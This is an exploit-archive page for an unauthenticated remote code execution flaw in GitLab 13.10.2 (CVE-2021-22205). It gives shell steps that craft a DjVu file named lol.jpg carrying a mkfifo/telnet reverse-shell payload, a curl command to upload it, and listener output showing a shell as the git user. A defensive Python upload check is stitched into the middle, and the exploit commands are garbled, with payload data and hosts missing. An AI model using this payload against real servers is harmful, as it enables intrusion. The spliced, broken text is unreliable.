GitLab 13.10.2 Remote Code Execution

GitLab version 13.10.2 remote code execution exploit that provides a reverse shell.

MD5 | a203e85e39e4798bc3ada54cb3cc7271

# Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)
# Shodan Dork:
# Date: 11/01/2021
# Exploit Author: Jacob Baines
# Vendor Homepage:
# Software Link:
# Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8
# Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)
# CVE : CVE-2021-22205
# Vendor Advisory:
# Root Cause Analysis:

Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps: first generating the payload, then sending it.
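A defender-side check for the root cause described above, added here as an example and not part of the original exploit or of GitLab's code: it sniffs an upload's leading bytes and flags DjVu content regardless of the extension it carries, so a file like lol.jpg would be stopped before an image-processing step hands it to ExifTool. The function and constant names are my own and the sample inputs are constructed.

```python
import struct

# Format signatures used by the check. DjVu is an IFF-style container that
# opens with "AT&TFORM", a 4-byte big-endian length, then a form type of
# DJVU (single page), DJVM (multi-page bundle) or DJVI (shared component).
DJVU_MAGIC = b"AT&TFORM"
DJVU_FORMS = {b"DJVU", b"DJVM", b"DJVI"}
JPEG_MAGIC = b"\xff\xd8\xff"


def sniff_format(data: bytes) -> str:
    """Identify the container from leading bytes only, ignoring the filename."""
    if data[:3] == JPEG_MAGIC:
        return "jpeg"
    if len(data) >= 16 and data[:8] == DJVU_MAGIC and data[12:16] in DJVU_FORMS:
        return "djvu"
    return "unknown"


def check_upload(filename: str, data: bytes) -> tuple:
    """Return (sniffed_format, should_block, reason) for one uploaded file.

    Any DjVu body is blocked outright, since nothing on an image-upload
    endpoint should pass DjVu to ExifTool; an extension that disagrees with
    the sniffed format is reported so the event can be logged as well.
    """
    fmt = sniff_format(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if fmt == "djvu":
        return fmt, True, f"DjVu content uploaded as .{ext or '?'}"
    if fmt == "jpeg" and ext not in ("jpg", "jpeg"):
        return fmt, False, f"JPEG content with .{ext or '?'} extension"
    return fmt, False, "no anomaly"


# Constructed sample inputs (not the exploit's bytes, which this page omits).
SAMPLE_JPEG = JPEG_MAGIC + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 24
SAMPLE_DJVU_AS_JPG = DJVU_MAGIC + struct.pack(">I", 40) + b"DJVU" + b"\x00" * 40

if __name__ == "__main__":
    for name, blob in (("photo.jpg", SAMPLE_JPEG), ("lol.jpg", SAMPLE_DJVU_AS_JPG)):
        print(name, check_upload(name, blob))
```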

1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to port 1270.

echo -e
| base64 -d > lol.jpg
echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 1270 0<$TF | sh 1>$TF' >> lol.jpg
echo -n
| base64 -d >> lol.jpg

2. Sending the payload. Any random endpoint will do.

curl -v -F '[email protected]'$(openssl rand -hex 8)

2a. Sample Output from the reverse shell:

$ nc -lnvp 1270
Listening on [] (family 0, port 1270)
Connection from [] port 1270 [tcp/*] accepted (family 2, sport
uid=998(git) gid=998(git) groups=998(git)
